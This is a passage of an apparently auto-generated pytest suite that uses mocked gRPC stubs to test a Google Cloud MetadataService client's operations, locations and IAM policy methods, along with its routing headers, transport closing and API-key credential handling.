# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.wait_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_wait_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.wait_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_get_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.GetOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
@pytest.mark.asyncio
async def test_get_operation_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.GetOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
def test_get_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.GetOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
call.return_value = operations_pb2.Operation()
client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.GetOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
await client.get_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_get_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.get_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_get_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.get_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_list_operations(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.ListOperationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.ListOperationsResponse()
response = client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.ListOperationsResponse)
@pytest.mark.asyncio
async def test_list_operations_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.ListOperationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.ListOperationsResponse()
)
response = await client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.ListOperationsResponse)
def test_list_operations_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.ListOperationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
call.return_value = operations_pb2.ListOperationsResponse()
client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_operations_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.ListOperationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.ListOperationsResponse()
)
await client.list_operations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_list_operations_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.ListOperationsResponse()
response = client.list_operations(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_list_operations_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_operations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.ListOperationsResponse()
)
response = await client.list_operations(
request={
"name": "locations",
}
)
call.assert_called()
def test_list_locations(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.ListLocationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.ListLocationsResponse()
response = client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.ListLocationsResponse)
@pytest.mark.asyncio
async def test_list_locations_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.ListLocationsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.ListLocationsResponse()
)
response = await client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.ListLocationsResponse)
def test_list_locations_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.ListLocationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
call.return_value = locations_pb2.ListLocationsResponse()
client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_locations_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.ListLocationsRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.ListLocationsResponse()
)
await client.list_locations(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_list_locations_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.ListLocationsResponse()
response = client.list_locations(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_list_locations_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_locations), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.ListLocationsResponse()
)
response = await client.list_locations(
request={
"name": "locations",
}
)
call.assert_called()
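# Every field-header test above and below re-implements the same
# x-goog-request-params assertion. A consolidation sketch (a hypothetical
# helper, not part of the generated surface) could read:
def _assert_routing_header(call, expected_params):
    """Check that the first stub invocation carried the expected routing header."""
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", expected_params) in kw["metadata"]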
def test_get_location(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.GetLocationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.Location()
response = client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.Location)
@pytest.mark.asyncio
async def test_get_location_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = locations_pb2.GetLocationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.Location()
)
response = await client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, locations_pb2.Location)
def test_get_location_field_headers():
client = MetadataServiceClient(credentials=ga_credentials.AnonymousCredentials())
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.GetLocationRequest()
request.name = "locations/abc"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
call.return_value = locations_pb2.Location()
client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations/abc",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_location_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials()
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = locations_pb2.GetLocationRequest()
request.name = "locations/abc"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_location), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.Location()
)
await client.get_location(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations/abc",
) in kw["metadata"]
def test_get_location_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_location), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = locations_pb2.Location()
response = client.get_location(
request={
"name": "locations/abc",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_get_location_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.get_location), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
locations_pb2.Location()
)
response = await client.get_location(
request={
"name": "locations",
}
)
call.assert_called()
def test_set_iam_policy(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.SetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
response = client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_set_iam_policy_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.SetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
)
response = await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_set_iam_policy_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
def test_set_iam_policy_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy_pb2.Policy(version=774),
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_set_iam_policy_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
response = await client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy_pb2.Policy(version=774),
}
)
call.assert_called()
def test_get_iam_policy(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.GetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
response = client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_get_iam_policy_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.GetIamPolicyRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(
version=774,
etag=b"etag_blob",
)
)
response = await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_iam_policy_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
def test_get_iam_policy_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.get_iam_policy(
request={
"resource": "resource_value",
"options": options_pb2.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_get_iam_policy_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
response = await client.get_iam_policy(
request={
"resource": "resource_value",
"options": options_pb2.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
def test_test_iam_permissions(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.TestIamPermissionsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
response = client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
@pytest.mark.asyncio
async def test_test_iam_permissions_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = iam_policy_pb2.TestIamPermissionsRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
)
response = await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_test_iam_permissions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"resource=resource/value",
) in kw["metadata"]
def test_test_iam_permissions_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
response = client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_test_iam_permissions_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
response = await client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
def test_transport_close():
transports = {
"grpc": "_grpc_channel",
}
for transport, close_name in transports.items():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
with mock.patch.object(
type(getattr(client.transport, close_name)), "close"
) as close:
with client:
close.assert_not_called()
close.assert_called_once()
def test_client_ctx():
transports = [
"grpc",
]
for transport in transports:
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport
)
# Test client calls underlying transport.
with mock.patch.object(type(client.transport), "close") as close:
close.assert_not_called()
with client:
pass
close.assert_called()
@pytest.mark.parametrize(
"client_class,transport_class",
[
(MetadataServiceClient, transports.MetadataServiceGrpcTransport),
(MetadataServiceAsyncClient, transports.MetadataServiceGrpcAsyncIOTransport),
],
)
def test_api_key_credentials(client_class, transport_class):
with mock.patch.object(
google.auth._default, "get_api_key_credentials", create=True
) as get_api_key_credentials:
mock_cred = mock.Mock()
get_api_key_credentials.return_value = mock_cred
options = client_options.ClientOptions()
options.api_key = "api_key"
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=mock_cred,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
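# For reference, the API-key branch exercised by test_api_key_credentials above
# corresponds to client construction of roughly this shape. This is a sketch:
# it assumes google-api-core's ClientOptions accepts an api_key argument, which
# is the code path the mocked get_api_key_credentials simulates.
def example_api_key_client():  # pragma: no cover, illustrative only
    opts = client_options.ClientOptions(api_key="my-api-key")
    return MetadataServiceClient(client_options=opts)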
| 36.267447
| 130
